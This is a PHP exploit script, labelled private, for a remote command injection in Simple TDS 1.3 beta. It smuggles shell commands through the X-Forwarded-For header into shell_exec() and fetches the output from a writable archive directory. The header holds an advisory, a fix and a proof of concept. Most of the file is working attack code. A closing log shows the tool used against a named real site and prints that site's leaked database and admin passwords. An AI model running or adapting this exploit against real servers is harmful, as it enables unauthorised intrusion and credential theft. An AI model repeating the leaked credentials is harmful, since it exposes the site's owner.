<?php
/*
* 0x48k-stds13b-shellexec.php
* ========================
*
* EXPLOIT: Simple TDS <= 1.3 beta
* VULNERABILITY: shell_exec() Remote Command Injection Exploit
* WEB-SITE: hellknights.void.ru
*
* ADVISORY:
* =========
*
* An unauthenticated client can inject shell commands into the shell_exec() call in go.php through the $ip variable, which is built from request headers:
*
* line#45: $ip = @getip();
* line#57: $addr = @explode (' ', @shell_exec ('' . $geoip_path . ' ' . $ip));
*
* The $ip value is taken from the Client-IP / X-Forwarded-For request headers, which getip() reads from the server environment without any validation (the function begins at line#9):
*
* function getip ()
* {
* if ((@getenv('HTTP_CLIENT_IP') AND @strcasecmp(@getenv('HTTP_CLIENT_IP'), 'unknown')))
* {
* $ip = @getenv('HTTP_CLIENT_IP');
* }
* else
* {
* if ((@getenv('HTTP_X_FORWARDED_FOR') AND @strcasecmp(@getenv('HTTP_X_FORWARDED_FOR'), 'unknown')))
* {
* $ip = @getenv('HTTP_X_FORWARDED_FOR');
* }
* ...
*
* The world-writable "archive" directory (mode 777) can be used to capture command output, which is then fetched back over HTTP.
* Fix: validate $ip with filter_var($ip, FILTER_VALIDATE_IP) (or at minimum pass it through escapeshellarg()) before it reaches shell_exec(), and never treat Client-IP / X-Forwarded-For as trusted input.
*
* PROOF-OF-CONCEPT (reading config.php file):
* ===========================================
*
* $ telnet localhost 80
* GET /stds_1_3beta/go.php HTTP/1.0
* User-Agent: l33th4x0r
* X-Forwarded-For: 127.0.0.1; cat config.php > ./archive/tmp.txt
* Host: localhost
*
* $ GET http://localhost/stds_1_3beta/archive/tmp.txt
* <?php
*
* $mysql_host = "localhost";
* $mysql_login = "root";
* $mysql_password = "z3r0d4yy";
* $my_database = "stds";
*
* $password = "fhutynbyf";
* …
*/
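// send http packet function
/**
 * Open a TCP connection to $host:$port, write $packet and, when $recv is
 * true, echo everything the server returns until it closes the connection.
 *
 * @param string $host   target host name or IP address
 * @param int    $port   target TCP port
 * @param string $packet raw HTTP request, CRLF-terminated, including the blank line
 * @param bool   $recv   stream the raw response to stdout when true
 * @return void
 *
 * Terminates the script when the connection cannot be opened or the request
 * cannot be written. The original discarded $errno/$errstr, so "cant connect"
 * gave no hint whether the host, the port or a filter was the problem.
 */
function SendPacket($host, $port, $packet, $recv)
{
    $errno = 0;
    $errstr = '';
    $sock = fsockopen($host, $port, $errno, $errstr);
    if (!$sock) {
        die("\ncant connect to remote server ($host:$port): [$errno] $errstr");
    }
    // fwrite() returns the byte count or false; anything short of the full
    // request means the target never saw it, so there is no reply to wait for.
    $written = fwrite($sock, $packet);
    if ($written === false || $written < strlen($packet)) {
        fclose($sock);
        die("\nfailed to send request to $host:$port");
    }
    if ($recv) {
        // HTTP/1.0 request without keep-alive: the server closes when done.
        while (!feof($sock)) {
            $out = fgets($sock, 99999);
            if ($out === false) {
                break;
            }
            echo $out;
        }
    }
    fclose($sock);
}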
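// string cut
/**
 * Return the characters of $string from index $offset_from through
 * $offset_to, both inclusive (strxcut('abcdef', 1, 3) === 'bcd').
 *
 * @param string $string      source string
 * @param int    $offset_from first index to copy; values below 0 are treated as 0
 * @param int    $offset_to   last index to copy; clamped to strlen($string) - 1
 * @return string             the slice, '' when the range is empty
 *
 * The original read $string[$i] one character at a time and emitted an
 * "Uninitialized string offset" warning whenever $offset_to reached
 * strlen($string) (the caller passes strlen($output) when the output path
 * does not contain index.html). Clamping the range removes that.
 */
function strxcut($string, $offset_from, $offset_to)
{
    $string = (string) $string;
    $first = max(0, (int) $offset_from);
    // Last valid index; -1 for the empty string.
    $last = min((int) $offset_to, strlen($string) - 1);
    if ($first > $last) {
        return '';
    }
    return substr($string, $first, $last - $first + 1);
}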
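// packet dump
/**
 * Render $string as a hex dump followed by a printable-character dump.
 *
 * Every byte becomes " xx" in the hex part and " c" in the text part, where
 * c is the character itself for printable ASCII (33..126) and "." for
 * everything else (control bytes, space, bytes above 126). A CRLF is added
 * to both parts after every 15 bytes. Result: hex part, CRLF, text part.
 *
 * @param string $string raw bytes to dump
 * @return string        formatted dump
 *
 * The original initialised $result/$exa with a mangled quote character
 * ($result=“;), which does not parse; it is restored to ''.
 */
function quick_dump($string)
{
    $string = (string) $string;
    $text = '';
    $hex = '';
    $col = 0;
    $len = strlen($string);
    for ($i = 0; $i < $len; $i++) {
        $byte = ord($string[$i]);
        // Space and non-printables are shown as "." so the columns stay aligned.
        $text .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
        // Zero-padded two-digit hex, replacing the strlen(dechex()) check.
        $hex .= sprintf(' %02x', $byte);
        if (++$col === 15) {
            $col = 0;
            $text .= "\r\n";
            $hex .= "\r\n";
        }
    }
    return $hex . "\r\n" . $text;
}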
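// usage information
echo "\r\n";
echo "0x48k-stds13b-shellexec.php\r\n";
echo "========================\r\n\r\n";
echo "Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit\r\n";
echo "THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE\r\n";
echo "site: http://hellknights.void.ru/\r\n\r\n";
// Five positional arguments are required (host port path output cmd), so
// $argc must be at least 6 because $argv[0] is the script name. The original
// tested "$argc < 5", which let a four-argument call through and then read
// the undefined $argv[5] as the command.
if ($argc < 6)
{
    echo "Usage: php ".$argv[0]." host port path output cmd\r\n";
    echo "host: target server (ip/hostname)\r\n";
    echo "port: target web-server’s port\r\n";
    echo "path: path to Simple TDS\r\n";
    echo "output: output file (use ./archive/stats/index.html)\r\n";
    echo "cmd: a shell command\r\n";
    echo "\n\nExamples:\r\n";
    echo "(1) READ CONFIG.PHP FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html cat config.php\r\n";
    echo "(2) DONT FORGET TO DELETE OUTPUT FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html rm ./archive/index.html\r\n";
    die;
}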
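// some configs
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)";
$get_root_index = "index.html";
$dump_output = TRUE; // FALSE;
$xforward_ip = "127.0.0.1";
echo "———————————–\r\n";
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$output = $argv[4];
// Everything from $argv[5] onwards is the command; re-join the words the
// calling shell split apart. Guarding on $argc avoids an "undefined array
// key" warning when no command was given.
$cmd = ($argc > 5) ? implode(' ', array_slice($argv, 5)) : '';
$file_output = TRUE;
echo "host: ".$host."\r\n";
echo "port: ".$port."\r\n";
echo "path: ".$path."\r\n";
echo "output: ".$output."\r\n";
echo "cmd: ".$cmd."\r\n";
$cmd_inject = "$cmd";
// output to file ? (if rm output_file)
// The cleanup invocation ("rm $output") must not redirect into the file it
// is deleting, so only ordinary commands get the " > $output" suffix.
if ($cmd === "rm $output" || $cmd === "del $output") {
    $file_output = FALSE;
}
if ($file_output) {
    $cmd_inject .= " > $output";
}
// Derive the URL path used to fetch the output file back. When the file is
// the directory index (index.html) the directory itself is requested;
// otherwise the file is. A leading "./" or "/" is dropped because $path
// already ends with "/".
$pos_to = strpos($output, $get_root_index);
if ($pos_to === false) {
    // strpos() returns 0 when index.html is at the very start, which the
    // original's "!$pos_to" treated as "not found". Last valid index is
    // strlen - 1; the original passed strlen, one past the end.
    $pos_to = strlen($output) - 1;
} else {
    $pos_to = $pos_to - 1;
}
$pos_from = 0;
if (substr($output, 0, 2) === "./") {
    $pos_from = 2;
} elseif (substr($output, 0, 1) === "/") {
    $pos_from = 1;
}
$web_output = strxcut($output, $pos_from, $pos_to);
echo "———————————–\r\n";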
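// exploit
// Stage 1: trigger the injection. go.php concatenates the X-Forwarded-For
// value into shell_exec(), so "<ip>; <cmd>" runs <cmd> on the server.
// $cmd_inject already carries the " > $output" redirect unless the command
// is the cleanup "rm $output" (see $file_output above). The original built
// $cmd_inject and then ignored it, always sending "$cmd > $output" — which
// for the cleanup case became "rm X > X". $path is expected to end with "/".
$packet = "GET ".$path."go.php HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"X-Forwarded-For: $xforward_ip; $cmd_inject\r\n".
"Host: $host\r\n\r\n";
echo "\r\n\r\n[+] sending exploit…\r\n\r\n";
if ($dump_output) echo quick_dump($packet);
SendPacket($host, $port, $packet, FALSE);
// Stage 2: fetch the captured output from the web-readable archive directory.
$packet = "GET ".$path."$web_output HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"Host: $host\r\n\r\n";
if ($file_output)
{
    echo "\r\n\r\n[+] get command result from output file…\r\n\r\n";
    if ($dump_output) echo quick_dump($packet);
    echo "\r\n\r\n";
    SendPacket($host, $port, $packet, TRUE);
    echo "\r\n\r\n[+] exploited.\ndont forget to delete output file: rm $output\r\n\r\n";
}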
/*
EXPLOITING iyog.ru LOG:
### READING CONFIG FILE
[wrk] C:\$ C:\web\usr\bin\php5.exe C:\0x48k-stds13b-shellexec.php iyog.ru 80 / ./archive/stats/index.html cat config.php
0x48k-stds13b-shellexec.php
========================
Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit
THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE
by deadlock ([email protected])
site: http://hellknights.void.ru/
———————————–
host: iyog.ru
port: 80
path: /
output: ./archive/stats/index.html
cmd: cat config.php
———————————–
[+] sending exploit…
47 45 54 20 2f 67 6f 2e 70 68 70 20 48 54 54
50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65
6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30
20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 57
69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
72 75 3b 20 72 76 3a 31 2e 39 2e 32 2e 33 29
20 47 65 63 6b 6f 2f 32 30 31 30 30 34 30 31
20 46 69 72 65 66 6f 78 2f 33 2e 36 2e 33 20
28 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 33
30 37 32 39 29 0d 0a 58 2d 46 6f 72 77 61 72
64 65 64 2d 46 6f 72 3a 20 31 32 37 2e 30 2e
30 2e 31 3b 20 63 61 74 20 63 6f 6e 66 69 67
2e 70 68 70 20 3e 20 2e 2f 61 72 63 68 69 76
65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e 68
74 6d 6c 0d 0a 48 6f 73 74 3a 20 69 79 6f 67
2e 72 75 0d 0a 0d 0a
G E T . / g o . p h p . H T T
P / 1 . 0 . . U s e r – A g e
n t : . M o z i l l a / 5 . 0
. ( W i n d o w s ; . U ; . W
i n d o w s . N T . 5 . 1 ; .
r u ; . r v : 1 . 9 . 2 . 3 )
. G e c k o / 2 0 1 0 0 4 0 1
. F i r e f o x / 3 . 6 . 3 .
( . N E T . C L R . 3 . 5 . 3
0 7 2 9 ) . . X – F o r w a r
d e d – F o r : . 1 2 7 . 0 .
0 . 1 ; . c a t . c o n f i g
. p h p . > . . / a r c h i v
e / s t a t s / i n d e x . h
t m l . . H o s t : . i y o g
. r u . . . .
[+] get command result from output file…
47 45 54 20 2f 61 72 63 68 69 76 65 2f 73 74
61 74 73 2f 20 48 54 54 50 2f 31 2e 30 0d 0a
55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a
69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f
77 73 3b 20 55 3b 20 57 69 6e 64 6f 77 73 20
4e 54 20 35 2e 31 3b 20 72 75 3b 20 72 76 3a
31 2e 39 2e 32 2e 33 29 20 47 65 63 6b 6f 2f
32 30 31 30 30 34 30 31 20 46 69 72 65 66 6f
78 2f 33 2e 36 2e 33 20 28 2e 4e 45 54 20 43
4c 52 20 33 2e 35 2e 33 30 37 32 39 29 0d 0a
48 6f 73 74 3a 20 69 79 6f 67 2e 72 75 0d 0a
0d 0a
G E T . / a r c h i v e / s t
a t s / . H T T P / 1 . 0 . .
U s e r – A g e n t : . M o z
i l l a / 5 . 0 . ( W i n d o
w s ; . U ; . W i n d o w s .
N T . 5 . 1 ; . r u ; . r v :
1 . 9 . 2 . 3 ) . G e c k o /
2 0 1 0 0 4 0 1 . F i r e f o
x / 3 . 6 . 3 . ( . N E T . C
L R . 3 . 5 . 3 0 7 2 9 ) . .
H o s t : . i y o g . r u . .
. .
HTTP/1.0 200 OK
Date: Sun, 11 Apr 2010 15:48:45 GMT
Server: Apache
Last-Modified: Sun, 11 Apr 2010 15:48:44 GMT
ETag: "2a6906-6db-483f7f6958f00"
Accept-Ranges: bytes
Content-Length: 1755
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
X-Cache: MISS from turbine0.ht-systems.ru
Connection: close
<?php
$mysql_host = "mysql-maxlibtt.ht-systems.ru:3306";
$mysql_login = "maxlibtt_natu";
$mysql_password = "264Uw4Kw";
$my_database = "maxlibtt_tds";
$password = "fhutynbyf"; //¦рЁюы№ фы фюёЄєяр ъ рфьшэъх ёъЁшяЄр
$debug = false; //LёЄрэютшЄ№ т true хёыш эєцхэ Ёхцшь юЄырфъш. T ¤Єюь Ёхцшь
х эх яЁюшёїюфшЄ ЁхфшЁхъЄ ЄЁрЇр.
$scripturl = "http://iyog.ru/"; //LЁы ёъЁшяЄр ё чръЁvтр¦•шь ёых°хь тъюэЎх.
$reserved_url = "http://www.google.com"; //¦хчхЁтэvщ єЁы, эр ъюЄюЁvщ ы№хЄё ЄЁрЇ
яЁш ю°шсърї
//(эх эрёЄЁюхэv рєЄv фы ёїхьv,
//эхяЁртшы№эvщ sid ёїхьv т чряЁюёх, ёыш°ъюь цхёЄъшх єёыютш Їшы№ЄЁют ш Є.ф.)
$nogeoip = "allow"; //+Єю фхырЄ№, хёыш эх юсэрЁєцхэ GeoIP, Є.х. хёыш
эх юяЁхфхышыё ъюф ёЄЁрэv
//+ёыш ттхёЄш allow – Єю тёх рєЄv сєфєЄ ЁрчЁх°х
эv (Є.х. ъръ сєфЄю є эшї яЁюяшёрэю ALL)
//+ёыш ттхёЄш block – Єю тёх эх-ALL рєЄv сєфєЄ
сыюъшЁютрэv
$geoip_path = "/usr/local/bin/geoiplookup"; //¦єЄ№ фю GeoIP. =хюсїюф
шь Єюы№ъю хёыш шчтхёЄэю, ўЄю эр їюёЄх ёЄюшЄ GeoIP,
//эю ёЄЁрэр эх юяЁхфхы х
Єё . LчэрЄ№ фрээvщ яєЄ№ ьюцэю є ёряяюЁЄр їюёЄшэур.
#### -ры№°х эх ЁхфръЄшЁютрЄ№ #########################
if ($debug) error_reporting(E_ALL); else error_reporting(0);
@ignore_user_abort (true);
mysql_connect($mysql_host, $mysql_login, $mysql_password)
or die ("Could not connect to MySQL");
mysql_select_db ($my_database)
or die ("Could not select database");
//+Єхэшх эрёЄЁюхъ Simple tDS
$global_settings = array();
$qu = "SELECT * FROM `settings`";
$result = mysql_query ($qu); //+шЄрхь тёх эрёЄЁющъш…
while ($line = mysql_fetch_array($result)){
$name=$line[’name‘];
$val = $line[‚value‘];
$global_settings[$name] = $val;
}
//¦юэхЎ ўЄхэш эрёЄЁюхъ
?>
[+] exploited.
dont forget to delete output file: rm ./archive/stats/index.html
## DELETE OUTPUT FILE
[wrk] C:\lproj\stxbot$ C:\web\usr\bin\php5.exe C:\0x48k-stds13b-shellexec.php iyog.ru 80 / ./archive/stats/index.html rm ./archive/stats/index.html
0x48k-stds13b-shellexec.php
========================
Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit
THIS IS PRIVATE EXPLOIT CODE, PLEASE DONT DISTRIBUTE
by deadlock ([email protected])
site: http://hellknights.void.ru/
———————————–
host: iyog.ru
port: 80
path: /
output: ./archive/stats/index.html
cmd: rm ./archive/stats/index.html
———————————–
[+] sending exploit…
47 45 54 20 2f 67 6f 2e 70 68 70 20 48 54 54
50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65
6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30
20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 57
69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
72 75 3b 20 72 76 3a 31 2e 39 2e 32 2e 33 29
20 47 65 63 6b 6f 2f 32 30 31 30 30 34 30 31
20 46 69 72 65 66 6f 78 2f 33 2e 36 2e 33 20
28 2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 33
30 37 32 39 29 0d 0a 58 2d 46 6f 72 77 61 72
64 65 64 2d 46 6f 72 3a 20 31 32 37 2e 30 2e
30 2e 31 3b 20 72 6d 20 2e 2f 61 72 63 68 69
76 65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e
68 74 6d 6c 20 3e 20 2e 2f 61 72 63 68 69 76
65 2f 73 74 61 74 73 2f 69 6e 64 65 78 2e 68
74 6d 6c 0d 0a 48 6f 73 74 3a 20 69 79 6f 67
2e 72 75 0d 0a 0d 0a
G E T . / g o . p h p . H T T
P / 1 . 0 . . U s e r – A g e
n t : . M o z i l l a / 5 . 0
. ( W i n d o w s ; . U ; . W
i n d o w s . N T . 5 . 1 ; .
r u ; . r v : 1 . 9 . 2 . 3 )
. G e c k o / 2 0 1 0 0 4 0 1
. F i r e f o x / 3 . 6 . 3 .
( . N E T . C L R . 3 . 5 . 3
0 7 2 9 ) . . X – F o r w a r
d e d – F o r : . 1 2 7 . 0 .
0 . 1 ; . r m . . / a r c h i
v e / s t a t s / i n d e x .
h t m l . > . . / a r c h i v
e / s t a t s / i n d e x . h
t m l . . H o s t : . i y o g
. r u . . . .
*/
?>